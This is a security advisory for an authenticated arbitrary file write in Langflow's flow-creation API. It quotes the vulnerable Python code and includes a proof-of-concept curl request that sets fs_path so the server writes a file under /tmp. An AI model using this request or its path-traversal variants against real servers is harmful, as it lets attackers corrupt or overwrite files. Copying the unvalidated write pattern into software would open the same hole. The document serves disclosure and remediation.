PT-2025-54699 · Pypi · Langflow
Publicado
2025-12-19
·
Atualizado
2025-12-19
CVSS v3.1
7.1
Alta
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L |
Vulnerability Overview
If an arbitrary path is specified in the request body's
fs path, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is.Vulnerable Code
- It receives the request body (flow), updates the DB, and then passes it to the file-writing sink.
python
@router.post("/", response model=FlowRead, status code=201)
async def create flow(
*,
session: DbSession,
flow: FlowCreate,
current user: CurrentActiveUser,
):
try:
db flow = await new flow(session=session, flow=flow, user id=current user.id)
await session.commit()
await session.refresh(db flow)
await save flow to fs(db flow)
except Exception as e:- Applies authentication dependency (requires API Key/JWT) when accessing the endpoint.
python
CurrentActiveUser = Annotated[User, Depends(get current active user)]
CurrentActiveMCPUser = Annotated[User, Depends(get current active user mcp)]
DbSession = Annotated[AsyncSession, Depends(get session)]- The client can directly specify the save path, including
fs path.
python
):
try:
await verify fs path(flow.fs path)
"""Create a new flow."""- It attempts to create the file (or the file, in the case of a path without a parent) directly without path validation.
python
async def verify fs path(path: str | None) -> None:
if path:
path = Path(path)
if not await path .exists():
await path .touch()- Serializes the Flow object to JSON and writes it to the specified path in "w" mode (overwriting).
python
async def save flow to fs(flow: Flow) -> None:
if flow.fs path:
async with async open(flow.fs path, "w") as f:
try:
await f.write(flow.model dump json())
except OSError:
await logger.aexception("Failed to write flow %s to path %s", flow.name, flow.fs path)PoC Description
When an authenticated user passes an arbitrary path in
fs path, the Flow JSON is written to that path. Since /tmp is usually writable, it is easy to reproduce. In a production environment, writing to system-protected directories may fail depending on permissions.PoC
-
Before Exploit
-
After Exploitbash
curl -sS -X POST "http://localhost:7860/api/v1/flows/" -H "Content-Type: application/json" -H "x-api-key: sk-8Kyzf9IQ-UEJ OtSTaJq4eniMT9 JKgZ7 q8PNkoxc" -d '{"name":"poc-etc","data":{"nodes":[],"edges":[]},"fs path":"/tmp/POC.txt"}'
Impact
- Authenticated Arbitrary File Write (within server permission scope): Risk of corrupting configuration/log/task files, disrupting application behavior, and tampering with files read by other components.
- Both absolute and relative paths are allowed, enabling base directory traversal. The risk of overwriting system files increases in environments with root privileges or weak mount/permission settings.
- The file content is limited to Flow JSON, but the impact is severe if the target file is parsed by a JSON parser or is subject to subsequent processing.
- In production environments, it is essential to enforce a save root, normalize paths, block symlink traversal, and minimize permissions.
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Langflow